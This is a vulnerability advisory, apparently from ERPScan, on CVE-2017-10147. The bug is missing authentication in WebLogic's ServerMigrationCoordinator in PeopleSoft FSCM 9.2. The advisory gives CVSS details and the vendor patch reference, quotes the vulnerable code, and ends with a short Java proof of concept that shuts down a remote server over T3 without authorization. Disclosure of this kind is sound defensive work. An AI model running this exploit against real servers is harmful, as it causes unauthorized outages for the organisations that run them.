Application: Oracle PeopleSoft
Versions Affected: PeopleSoft FSCM 9.2
Vendor: Oracle
Bug: Missing Authentication for Critical Function
Reported: 16.03.2017
Vendor response: 17.03.2017
Date of Public Advisory: 18.07.2017
Reference: Oracle CPU July 2017
Authors: Vahagn Vardanyan (ERPScan)
VULNERABILITY INFORMATION
Class: Missing Authentication
Risk: High
Impact: Impact on availability
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-10147
CVSS Information
CVSS Base Score v3: 8.6 / 10
CVSS Base Vector:
| AV: Attack Vector (Related exploit range) | Network (N) |
| AC: Attack Complexity (Required attack complexity) | Low (L) |
| PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
| UI: User Interaction (Required user participation) | None (N) |
| S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Changed (C) |
| C: Impact to Confidentiality | None (N) |
| I: Impact to Integrity | None (N) |
| A: Impact to Availability | High (H) |
VULNERABILITY DESCRIPTION
An attacker can use a special T3 request for stopping the remote server.
VULNERABLE PACKAGES
PeopleSoft FSCM 9.2
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, implement Oracle CPU July 2017.
TECHNICAL DESCRIPTION
The vulnerability is presented in WebLogic/cluster/singleton/ServerMigrationCoordinator class in migrate functionality.
When we call the migrate function using T3 protocol, the PeopleSoft server will be stopped without authorization.
@Override
public void migrate(final String serverName, final String sourceMachine, final String destinationMachine, final boolean sourceDown, final boolean destinationDown) throws ServerMigrationException {
ServerMigrationTask task = this.taskMap.get(serverName);
if (task == null) {
task = new ServerMigrationTask(serverName, destinationMachine);
if (MigrationDebugLogger.isDebugEnabled()) {
MigrationDebugLogger.debug(serverName + " New Migration Task " + task);
}
this.taskMap.put(serverName, task);
try {
this.stopServer(sourceDown, task);
this.startServer(destinationDown, task);
}
finally {
this.taskMap.remove(serverName);
}
return;
}
throw new ServerMigrationException("Migration operation in progress", null);
}
Proof of Concept
static boolean rem_server_stop(String PS_SERVER_IP, Server PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException {
Properties p = new Properties();
p.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
p.put(Context.PROVIDER_URL, "t3://"+PS_SERVER_IP+":"+PS_SERVER_PORT);
Context ctx = new InitialContext(p);
Object obj = ctx.lookup("weblogic/cluster/singleton/ServerMigrationCoordinator");
Object o = PortableRemoteObject.narrow(obj, ServerMigrationCoordinator.class);
ServerMigrationCoordinator h = (ServerMigrationCoordinator) o;
h.migrate("PIA","а","any_data_or_ip", true, true);
return false;
}
The post [ERPSCAN-17-041] Unauthorized Container Shutdown In ServerMigrationCoordinator appeared first on ERPScan.